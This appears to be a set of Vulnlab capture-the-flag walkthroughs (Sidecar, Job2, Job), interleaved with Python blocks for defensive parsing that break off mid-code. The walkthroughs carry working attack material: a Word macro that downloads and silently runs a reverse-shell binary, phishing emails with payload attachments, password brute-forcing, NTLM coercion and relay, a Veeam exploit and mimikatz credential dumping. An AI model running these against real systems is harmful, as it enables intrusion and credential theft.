    |_ 1/1/1601 12:00:00 AM
[+] uascompat
    |_ 0
[+] usnchanged
    |_ 110627
[+] instancetype
    |_ 5
[+] creationtime
    |_ 133743100080295319
[+] pwdhistorylength
    |_ 24
[+] ms-ds-machineaccountquota
    |_ 0
[+] subrefs
    |_ DC=ForestDnsZones,DC=Sidecar,DC=vl
    |_ DC=DomainDnsZones,DC=Sidecar,DC=vl
    |_ CN=Configuration,DC=Sidecar,DC=vl
[+] lockoutduration
    |_ -18000000000
[+] name
    |_ Sidecar


This means we can't perform an RBCD attack (https://www.thehacker.recipes/a-d/movement/kerberos/delegations/rbcd#rbcd-on-spn-less-users), as we would need another computer or service account that we control.
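The StandIn dump above is a raw domain-object audit. The Python below is an added example, not part of this writeup or of StandIn: it parses that output format, converts the AD interval attributes (stored as negative counts of 100-nanosecond units) and the FILETIME creationtime into readable values, and flags ms-DS-MachineAccountQuota, the setting that decides whether non-admin users may add computer accounts. The embedded sample is a constructed subset of the properties printed above.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed sample: a subset of the StandIn "--object" output shown on the page
SAMPLE_STANDIN_OUTPUT = """\
[?] Using DC : DC01.Sidecar.vl
[?] Object   : DC=Sidecar
    Path     : LDAP://DC=Sidecar,DC=vl

[?] Iterating object properties

[+] minpwdage
    |_ -864000000000
[+] creationtime
    |_ 133743100080295319
[+] pwdhistorylength
    |_ 24
[+] ms-ds-machineaccountquota
    |_ 0
[+] subrefs
    |_ DC=ForestDnsZones,DC=Sidecar,DC=vl
    |_ DC=DomainDnsZones,DC=Sidecar,DC=vl
[+] lockoutduration
    |_ -18000000000
[+] name
    |_ Sidecar
"""

HUNDRED_NS_PER_SECOND = 10_000_000
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def parse_standin_properties(text):
    """Parse '[+] attribute' headers followed by '    |_ value' lines into {attribute: [values]}."""
    props = {}
    current = None
    for line in text.splitlines():
        header = re.match(r"^\[\+\]\s+(\S+)\s*$", line)
        if header:
            current = header.group(1).lower()
            props[current] = []
            continue
        value = re.match(r"^\s+\|_\s*(.*)$", line)
        if value and current is not None:
            props[current].append(value.group(1).strip())
    return props


def interval_to_timedelta(value):
    """AD interval attributes (minPwdAge, lockoutDuration, ...) are negative 100-ns counts."""
    return timedelta(seconds=abs(int(value)) / HUNDRED_NS_PER_SECOND)


def filetime_to_datetime(value):
    """FILETIME: 100-ns intervals since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=int(value) // 10)


def audit_domain_object(text):
    """Turn the raw dump into the handful of policy facts a reviewer cares about."""
    p = parse_standin_properties(text)
    maq = int(p["ms-ds-machineaccountquota"][0])
    return {
        "domain": p["name"][0],
        "machine_account_quota": maq,
        # MAQ > 0 (default 10) lets any authenticated user create computer accounts
        "non_admins_can_add_computers": maq > 0,
        "min_password_age": interval_to_timedelta(p["minpwdage"][0]),
        "lockout_duration": interval_to_timedelta(p["lockoutduration"][0]),
        "password_history_length": int(p["pwdhistorylength"][0]),
        "creation_time_utc": filetime_to_datetime(p["creationtime"][0]),
        "naming_contexts": p["subrefs"],
    }


if __name__ == "__main__":
    for key, val in audit_domain_object(SAMPLE_STANDIN_OUTPUT).items():
        print(f"{key:30} {val}")
```

On the values from the page this yields a one-day minimum password age, a 30-minute lockout duration and a quota of 0, which is exactly the hardening that removes the "bring your own computer account" route relied on by the RBCD variant linked above.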

sliver (sitecar-3) > execute-shellcode -i /payloads/UnmanagedPowerShell.bin

[*] Started remote shell with pid 1652

PS > pwd

Path            
----            
C:\Windows\Tasks


# on sliver
[server] sliver (sitecar-3) > socks5 start

[*] Started SOCKS5 127.0.0.1 1081  

# on local machine
proxychains -q nxc smb 192.168.100.101 -u 'puck' -p ''


WebDAV

We first need the authentication request or hash from our machine account. As we can't relay SMB to SMB (or LDAP), we need to change our source to HTTP.
For this we need to enable WebDAV (https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/webclient)

We can check the current status using https://github.com/G0ldenGunSec/GetWebDAVStatus/

From a session (not a beacon) run:

sliver (sitecar-3) > upload GetWebDAVStatus.exe

[*] Wrote file to c:\Windows\Tasks\GetWebDAVStatus.exe

sliver (sitecar-3) > execute -o "GetWebDAVStatus.exe" "127.0.0.1" 

[*] Output:
[+] WebClient service is active on 127.0.0.1

sliver (sitecar-3) > execute "cmd.exe" "/c net use h: http://10.8.2.138/blub"

[*] Command executed successfully

sliver (sitecar-3) >  

DNS

WebDAV only works if we use a DNS name for our target, so we first need to add a new DNS entry to AD: https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/adidns-spoofing

For this we can use Powermad (https://github.com/Kevin-Robertson/Powermad), even in a newly spawned interactive shell.

I used this Sliver shellcode: https://github.com/mmnoureldin/UnmanagedPowerShell?tab=readme-ov-file which also contains Powermad.

Warning: if we use the interactive-shellcode session, we need to restart the Sliver server afterwards to execute assemblies.

So we run execute-shellcode -i /payloads/UnmanagedPowerShell.bin, and then add a DNS entry with New-ADIDNSNode -Tombstone -Verbose -Node kali.sidecar.vl -Data 10.8.2.138


sliver (sitecar-3) > execute-shellcode -i /payloads/UnmanagedPowerShell.bin

[*] Started remote shell with pid 3364

PS > pwd

Path            
----            
C:\Windows\Tasks



PS > New-ADIDNSNode -Tombstone -Verbose -Node kali.sidecar.vl -Data 10.8.2.138
VERBOSE: [+] Domain Controller = DC01.Sidecar.vl
VERBOSE: [+] Domain = Sidecar.vl
VERBOSE: [+] Forest = Sidecar.vl
VERBOSE: [+] ADIDNS Zone = Sidecar.vl
VERBOSE: [+] Distinguished Name = DC=kali.sidecar.vl,DC=Sidecar.vl,CN=MicrosoftDNS,DC=DomainDNSZones,DC=Sidecar,DC=vl
VERBOSE: [+] DNSRecord = 04-00-01-00-05-F0-00-00-1E-01-00-00-00-00-02-58-00-00-00-00-62-B1-38-00-0A-08-02-8A
[+] ADIDNS node kali.sidecar.vl added

PS > 
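Powermad prints the raw dnsRecord value it writes, and those hex dumps are the same bytes a defender sees when auditing the DomainDnsZones partition for records that were added outside the normal DHCP/DNS flow. The Python below is an added example, not from this writeup or from Powermad: it decodes the DNS_RPC_RECORD layout (MS-DNSP section 2.3.2.2) used by the AD dnsRecord attribute, recovers type, TTL, serial, the aging timestamp (hours since 1601-01-01 UTC, 0 for static records) and the address, and flags A records pointing outside an allowed set of networks. The two dumps are copied from the page; the allowed network 10.10.0.0/16 is an assumption standing in for the lab's own range.

```python
import ipaddress
import struct
from datetime import datetime, timedelta, timezone

# dnsRecord values exactly as Powermad printed them above
RECORD_PUCK = "04-00-01-00-05-F0-00-00-18-01-00-00-00-00-02-58-00-00-00-00-0F-B0-38-00-0A-08-02-8A"
RECORD_KALI = "04-00-01-00-05-F0-00-00-1E-01-00-00-00-00-02-58-00-00-00-00-62-B1-38-00-0A-08-02-8A"

DNS_TYPE_NAMES = {1: "A", 5: "CNAME", 28: "AAAA", 33: "SRV"}
DNS_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)   # TimeStamp counts whole hours from here
HEADER_LEN = 24


def parse_hex_dump(text):
    """Turn Powermad's 'AA-BB-CC' dump into bytes."""
    return bytes.fromhex(text.replace("-", ""))


def parse_dns_record(blob):
    """Decode one DNS_RPC_RECORD as stored in the dnsRecord attribute."""
    if len(blob) < HEADER_LEN:
        raise ValueError("dnsRecord header is 24 bytes")
    # DataLength, Type, Version, Rank, Flags, Serial are little-endian
    data_len, rtype, version, rank, flags, serial = struct.unpack_from("<HHBBHI", blob, 0)
    # TtlSeconds is the one big-endian field (network byte order); Reserved follows it
    (ttl,) = struct.unpack_from(">I", blob, 12)
    (timestamp_hours,) = struct.unpack_from("<I", blob, 20)
    data = blob[HEADER_LEN:HEADER_LEN + data_len]
    if len(data) != data_len:
        raise ValueError("truncated record data")
    record = {
        "type": DNS_TYPE_NAMES.get(rtype, str(rtype)),
        "version": version,
        "rank": rank,             # 0xF0 = RANK_ZONE, i.e. authoritative zone data
        "flags": flags,
        "serial": serial,
        "ttl": ttl,
        "timestamp": None if timestamp_hours == 0 else DNS_EPOCH + timedelta(hours=timestamp_hours),
        "data": data,
    }
    if rtype == 1 and data_len == 4:
        record["address"] = ".".join(str(b) for b in data)
    return record


def a_records_outside(records, allowed_networks):
    """A records whose address is not inside any of the allowed networks."""
    nets = [ipaddress.ip_network(n) for n in allowed_networks]
    return [r for r in records
            if "address" in r and not any(ipaddress.ip_address(r["address"]) in n for n in nets)]


if __name__ == "__main__":
    decoded = [parse_dns_record(parse_hex_dump(h)) for h in (RECORD_PUCK, RECORD_KALI)]
    for r in decoded:
        print(r["type"], r.get("address"), "ttl", r["ttl"], "serial", r["serial"], "created", r["timestamp"])
    # 10.10.0.0/16 is an assumed internal range for the lab, not a value from the page
    for r in a_records_outside(decoded, ["10.10.0.0/16"]):
        print("A record outside allowed ranges:", r["address"])
```

Both dumps decode to A records for 10.8.2.138 with a 600-second TTL and non-zero aging timestamps, so a periodic LDAP export of dnsRecord values run through this parser would surface both entries as records that point at an address outside the domain's own ranges.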

WebDAV to LDAP relay

Finally we need to trigger the HTTP authentication with PetitPotam or SpoolSample.


So now we exit and restart the Sliver C2 server,

then we execute:

execute-assembly -i -E /payloads/payloads/SpoolSample.exe "10.8.2.138 kali.sidecar.vl@80/blub.txt"
inline-execute-assembly /payloads/SpoolSample.exe "10.18.2.138 vulnlab@80/blub.txt"


Thus:

sliver (sitecar-3) > use b31f8184-a729-480c-b757-1ac3a3e67669

[*] Active session sitecar-3 (b31f8184-a729-480c-b757-1ac3a3e67669)

sliver (sitecar-3) > whoami

Logon ID: SIDECAR\E.Klaymore
[*] Current Token ID: SIDECAR\E.Klaymore
sliver (sitecar-3) > execute-assembly -i -E /payloads/SpoolSample.exe "10.8.2.138 kali.sidecar.vl@80/blub.txt"

[!] rpc error: code = Unknown desc = implant timeout
sliver (sitecar-3) >  

 

Catch it:

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ impacket-ntlmrelayx -t ldaps://dc01 --shadow-credentials --shadow-target 'ws01$'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.10.185.38, attacking target ldaps://dc01
[!] The client requested signing. Relaying to LDAP will not work! (This usually happens when relaying from SMB to LDAP)
[-] Authenticating against ldaps://dc01 as SIDECAR/E.KLAYMORE FAILED
[*] HTTPD(80): Client requested path: /puckshell.txt

Now we are stuck at this error:

The client requested signing. Relaying to LDAP will not work! (This usually happens when relaying from SMB to LDAP).
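Why ntlmrelayx gives up here, and why the WebDAV detour earlier in this section is needed at all, comes down to one bit in the client's NTLM negotiate flags. The Python below is an added example, not part of this writeup or of Impacket: it parses the NegotiateFlags out of a raw Type 1 or Type 3 NTLM blob (or out of an HTTP `Authorization: NTLM <base64>` header value) and reports whether NTLMSSP_NEGOTIATE_SIGN was set, which is the condition behind the "The client requested signing" warning. The SMB-style and HTTP-style flag sets are constructed samples, not captures from the lab.

```python
import base64
import struct

# NegotiateFlags bits from MS-NLMP section 2.2.2.5 (the subset used here)
NEGOTIATE_FLAG_BITS = {
    "NTLMSSP_NEGOTIATE_UNICODE": 0x00000001,
    "NTLMSSP_REQUEST_TARGET": 0x00000004,
    "NTLMSSP_NEGOTIATE_SIGN": 0x00000010,
    "NTLMSSP_NEGOTIATE_SEAL": 0x00000020,
    "NTLMSSP_NEGOTIATE_NTLM": 0x00000200,
    "NTLMSSP_NEGOTIATE_ALWAYS_SIGN": 0x00008000,
    "NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY": 0x00080000,
    "NTLMSSP_NEGOTIATE_128": 0x20000000,
    "NTLMSSP_NEGOTIATE_KEY_EXCH": 0x40000000,
    "NTLMSSP_NEGOTIATE_56": 0x80000000,
}
SIGN = NEGOTIATE_FLAG_BITS["NTLMSSP_NEGOTIATE_SIGN"]
SEAL = NEGOTIATE_FLAG_BITS["NTLMSSP_NEGOTIATE_SEAL"]

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NEGOTIATE_MESSAGE = 1      # Type 1
AUTHENTICATE_MESSAGE = 3   # Type 3


def build_negotiate_message(flags):
    """Build a minimal 32-byte NEGOTIATE_MESSAGE with empty DomainName and
    Workstation fields. Used here only to construct the sample blobs."""
    fixed = NTLMSSP_SIGNATURE + struct.pack("<II", NEGOTIATE_MESSAGE, flags)
    empty_field = struct.pack("<HHI", 0, 0, 32)   # Len, MaxLen, BufferOffset
    return fixed + empty_field + empty_field


def negotiate_flags(message):
    """Return the client's NegotiateFlags from a raw Type 1 or Type 3 message."""
    if message[:8] != NTLMSSP_SIGNATURE:
        raise ValueError("not an NTLMSSP message")
    (msg_type,) = struct.unpack_from("<I", message, 8)
    if msg_type == NEGOTIATE_MESSAGE:
        offset = 12   # directly after Signature and MessageType
    elif msg_type == AUTHENTICATE_MESSAGE:
        offset = 60   # after the six 8-byte field descriptors
    else:
        raise ValueError(f"message type {msg_type} carries no client flags")
    (flags,) = struct.unpack_from("<I", message, offset)
    return flags


def ntlm_from_authorization_header(value):
    """Decode the blob from an HTTP 'Authorization: NTLM <base64>' header value."""
    scheme, _, token = value.strip().partition(" ")
    if scheme.upper() != "NTLM":
        raise ValueError(f"unsupported scheme {scheme!r}")
    return base64.b64decode(token)


def describe_flags(flags):
    """Names of the flag bits that are set."""
    return [name for name, bit in NEGOTIATE_FLAG_BITS.items() if flags & bit]


def client_requested_signing(message):
    """The check behind ntlmrelayx's 'The client requested signing' warning:
    NTLMSSP_NEGOTIATE_SIGN set in the client's negotiate flags."""
    return bool(negotiate_flags(message) & SIGN)


# Constructed sample flag sets (not captured from the lab). An SMB client asks
# for signing and sealing; an HTTP client such as the WebClient service does not
# negotiate session signing, so those two bits are typically absent.
SMB_STYLE_FLAGS = 0
for _name in NEGOTIATE_FLAG_BITS:
    SMB_STYLE_FLAGS |= NEGOTIATE_FLAG_BITS[_name]
HTTP_STYLE_FLAGS = SMB_STYLE_FLAGS & ~(SIGN | SEAL)

SAMPLE_SMB_NEGOTIATE = build_negotiate_message(SMB_STYLE_FLAGS)
SAMPLE_HTTP_HEADER = "NTLM " + base64.b64encode(build_negotiate_message(HTTP_STYLE_FLAGS)).decode()

if __name__ == "__main__":
    for label, blob in (("SMB-style ", SAMPLE_SMB_NEGOTIATE),
                        ("HTTP-style", ntlm_from_authorization_header(SAMPLE_HTTP_HEADER))):
        print(label, "signing requested:", client_requested_signing(blob),
              describe_flags(negotiate_flags(blob)))
```

For a defender the same test over captured negotiate blobs shows which authentication sources are protected by signing negotiation alone and which are not; the HTTP-originated case is the one that only enforced LDAP signing and channel binding on the domain controllers shut down.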

to be continued …


vulnlab-job2

Job2 is a hard Windows machine, from phishing to admin.

Preparation

1. Enable Developer Tools in the Ribbon Menu to gain access to macros
2. Name your Macro AutoOpen() if you are working with Word 2016+
3. Select the Current Document as the place to store the Macro
4. Don’t use .docx as the file extension since it won’t allow for embedded macros. Either use .doc or .docm

Do the testing on your LAN first (a Kali box and a Windows 11 PC).

I used this macro:

Sub AutoOpen()

  a = Shell("""curl"" ""192.168.1.41/rcat.exe"" ""-o"" ""C:\Windows\tasks\rcat_192.168.1.41_443.exe""", vbHide)
  b = Shell("C:\Windows\tasks\rcat_192.168.1.41_443.exe", vbHide)

End Sub

Open puck3.docm twice: the first time to download rcat, the second time to execute rcat.exe.

If you receive a reverse shell, start the job2 box to go for the job.

Here we go …

We start with a nmap scan

Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-11 10:58 CEST
Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.93% done; ETC: 10:59 (0:00:00 remaining)
Stats: 0:01:01 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 85.00% done; ETC: 11:00 (0:00:00 remaining)
Nmap scan report for job2.vl (10.10.122.114)
Host is up (0.019s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 a39477ca160eecfb238667c60ae3ca7b (RSA)
|   256 0e2a317094995d95d4f840d5b5368e88 (ECDSA)
|_  256 29312ac355b2f773f2d3bdbcc5c114f0 (ED25519)
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: JOB2, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
111/tcp  open  rpcbind
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=www.job2.vl
| Subject Alternative Name: DNS:job2.vl, DNS:www.job2.vl
| Not valid before: 2023-05-09T13:31:40
|_Not valid after:  2122-05-09T13:41:37
|_http-title: Not Found
445/tcp  open  microsoft-ds?
1063/tcp open  rpcbind
2049/tcp open  rpcbind
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-07-11T08:59:58+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=JOB2
| Not valid before: 2024-07-10T08:57:44
|_Not valid after:  2025-01-09T08:57:44
Service Info: Host: JOB2; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-07-11T08:59:22
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.18 seconds

We examine the website and find out how to apply for the job.

Send your CV twice (of course, first change the test LAN IP in the macro of puck3.docm to your tun0 IP of the vulnhub VPN).

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ sendemail -s job2.vl -f "puck <puck@vulnlab.com>" -t hr@job2.vl -o tls=no -m "hey pls check my cv http://10.8.2.138/test" -a puck3.docm 

Jun 30 15:53:21 kali sendemail[35338]: Email was sent successfully!

Catch the shell

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.122.114 - - [11/Jul/2024 11:06:23] "GET /rcat.exe HTTP/1.1" 200 -

 

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.122.114] 50302
Microsoft Windows [Version 10.0.20348.1668]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

C:\Windows\system32>whoami
job2\julian

C:\Windows\system32>net users

User accounts for \\JOB2

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Ferdinand                
Guest                    Julian                   svc_veeam                
WDAGUtilityAccount       
The command completed successfully.


C:\Windows\system32>

Next I did a brute-force

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ crackmapexec winrm 10.10.122.114 -u Ferdinand -p /usr/share/wordlists/rockyou.txt

SMB         10.10.122.114   5985   JOB2             [*] Windows Server 2022 Build 20348 (name:JOB2) (domain:JOB2)
HTTP        10.10.122.114   5985   JOB2             [*] http://10.10.122.114:5985/wsman
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:123456
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:12345
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:123456789
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:password
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:iloveyou

and it found Ferdinand's password.

Next, evil-winrm into the box and find Veeam Backup installed,

and use CVE-2023-27532-RCE-Only to finish JOB2.

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ evil-winrm -u Ferdinand -p Fr<REDACTED>! -i 10.10.122.114
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ferdinand\Documents> netstat -ano | findstr /s 9401
  TCP    0.0.0.0:9401           0.0.0.0:0              LISTENING       2132
*Evil-WinRM* PS C:\Users\Ferdinand\Documents> 


*Evil-WinRM* PS C:\temp> upload Veeam.Backup.Interaction.MountService.dll
                                        
Info: Uploading /home/puck/vulnlab/job2/Veeam.Backup.Interaction.MountService.dll to C:\temp\Veeam.Backup.Interaction.MountService.dll
                                        
Data: 573544 bytes of 573544 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\temp> upload veeam.backup.model.dll
                                        
Info: Uploading /home/puck/vulnlab/job2/veeam.backup.model.dll to C:\temp\veeam.backup.model.dll
                                        
Data: 5925652 bytes of 5925652 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\temp> .\VeeamHax.exe --target 127.0.0.1 --cmd c:\temp\rcat_10.8.2.138_443.exe
Targeting 127.0.0.1:9401

And catch the admin shell:

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.103.24] 56039
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
nt authority\system

PS C:\users\Administrator\Desktop> dir
dir


    Directory: C:\users\Administrator\Desktop


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----          5/3/2023   2:04 PM           1029 LINQPad 5.lnk                                                        
-a----          5/3/2023   4:00 PM             36 root.txt                                                             


PS C:\users\Administrator\Desktop> type root.txt
type root.txt
VL{62e<REDACTED>2b7}
PS C:\users\Administrator\Desktop>

 

That’s all.

Beyond root

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # lsadump::sam
Domain : JOB2
SysKey : fb3d0b6fd4b888fb0bb4d3a6ba00dcd5
ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)

mimikatz # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM

764     {0;000003e7} 1 D 29290          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;01a2aee9} 3 F 35131903    JOB2\puck       S-1-5-21-3935782767-3829597994-1046841959-1004  (14g,24p)       Primary
 * Thread Token  : {0;000003e7} 1 D 37906026    NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz # lsadump::sam
Domain : JOB2
SysKey : fb3d0b6fd4b888fb0bb4d3a6ba00dcd5
Local SID : S-1-5-21-3935782767-3829597994-1046841959

SAMKey : 36c26e0a457c1d613a608d104acca9e9

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 6f2<REDACTED>04a

C:\Users\Julian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\phishs.bat

powershell \windows\phishsim.ps1

phishsim.ps1

Start-Process "C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE"

$watcher = New-Object System.IO.FileSystemWatcher
$watcher.Path = 'C:\programdata\attachments'
$watcher.EnableRaisingEvents = $true
$action =
{
    $name = $event.SourceEventArgs.FullPath    
    $changetype = $event.SourceEventArgs.ChangeType    
    Write-Host "$name was $changetype at $(get-date)"
    if(!$name.Contains("~")){
        if(Test-Path $name){    
            Write-Host "Opening $name"
            Start-Process "C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE" -ArgumentList "$name"
            sleep 45
            Write-Host "Resetting.."
            Get-Process "WINWORD.EXE" | Stop-Process -Force             
            Get-Process "WINWORD" | Stop-Process -Force  
            sleep 5
            Remove-Item $name -Force
         }
    }    
}
Register-ObjectEvent $watcher 'Created' -Action $action
Register-ObjectEvent $watcher 'Changed' -Action $action

for(;;){
    sleep 45
}

vulnlab-job


From Phishing to admin

Enrique A.

Tools used: sendemail, msfconsole, msfvenom, GodPotato

nmap scan

PORT     STATE SERVICE       VERSION
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: JOB, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Job.local
| http-methods: 
|_  Potentially risky methods: TRACE
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-06-28T14:15:50+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: JOB
|   NetBIOS_Domain_Name: JOB
|   NetBIOS_Computer_Name: JOB
|   DNS_Domain_Name: job
|   DNS_Computer_Name: job
|   Product_Version: 10.0.20348
|_  System_Time: 2024-06-28T14:15:10+00:00
| ssl-cert: Subject: commonName=job
| Not valid before: 2024-06-27T12:41:55
|_Not valid after:  2024-12-27T12:41:55
Service Info: Host: JOB; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-06-28T14:15:12
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.24 seconds

cat /etc/hosts | grep job
10.10.114.36 job.local

The website shows one email address: career@job.local

It also states that if you send your resume, it should be a LibreOffice document.

Phishing, try 1: getting some Windows hashes

First, generate an msf payload:

use auxiliary/fileformat/odt_badodt
set LHOST tun0
run

Then send a mail and catch the hashes it triggers:

sendemail -s job.local -f "puck <puck@vulnlab.com>" -t career@job.local -o tls=no -m "hey http://10.8.2.138/test" -a bad.odt 
Jun 21 15:46:10 kali sendemail[162513]: Email was sent successfully!
┌──(puck㉿kali)-[~/vulnlab/job]
└─$ impacket-smbserver -smb2support share .
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.99.156,51049)
[*] AUTHENTICATE_MESSAGE (JOB\jack.black,JOB)
[*] User JOB\jack.black authenticated successfully
[*] jack.black::JOB:aaaaaaaaaaaaaaaa:9b4c1be9c604bc2f1fdd46f203c4c1b3:010100000000000080f42a66e1c3da016f7c8cc4409768a80000000001001000640069004c004900700078006a00770003001000640069004c004900700078006a007700020010005500480078006a00430067004b007700040010005500480078006a00430067004b0077000700080080f42a66e1c3da0106000400020000000800300030000000000000000000000000200000f3afad144322c33a39d814751dfc312d1dd988dd18fbcedeab107cb49d9d84730a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000
[*] Closing down connection (10.10.99.156,51049)
[*] Remaining connections []
[*] Incoming connection (10.10.99.156,51050)
[*] AUTHENTICATE_MESSAGE (JOB\jack.black,JOB)
[*] User JOB\jack.black authenticated successfully
[*] 

The hash was uncrackable with john and rockyou.txt
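
To see what that capture actually contains, here is an added Python decoder (not part of the original writeup) for the NetNTLMv2 response line above. It splits impacket's `user::domain:challenge:proof:blob` form and walks the AV_PAIR target info as laid out in MS-NLMP; the fields an incident responder cares about are the timestamp and MsvAvTargetName, which records the SPN the client built for the server it was lured to (here a bare IP, cifs/10.8.2.138, rather than a corporate hostname). The hash line is embedded from the capture above.

```python
import struct
from datetime import datetime, timezone

# NetNTLMv2 line as impacket-smbserver printed it above
# (user::domain:server_challenge:NTProofStr:NTLMv2_CLIENT_CHALLENGE blob).
CAPTURED = (
    "jack.black::JOB:aaaaaaaaaaaaaaaa:9b4c1be9c604bc2f1fdd46f203c4c1b3:"
    "0101000000000000"                  # RespType, HiRespType, Reserved1, Reserved2
    "80f42a66e1c3da01"                  # TimeStamp (FILETIME, little-endian)
    "6f7c8cc4409768a8"                  # ChallengeFromClient
    "00000000"                          # Reserved3
    "01001000" "640069004c004900700078006a007700"   # MsvAvNbComputerName
    "03001000" "640069004c004900700078006a007700"   # MsvAvDnsComputerName
    "02001000" "5500480078006a00430067004b007700"   # MsvAvNbDomainName
    "04001000" "5500480078006a00430067004b007700"   # MsvAvDnsDomainName
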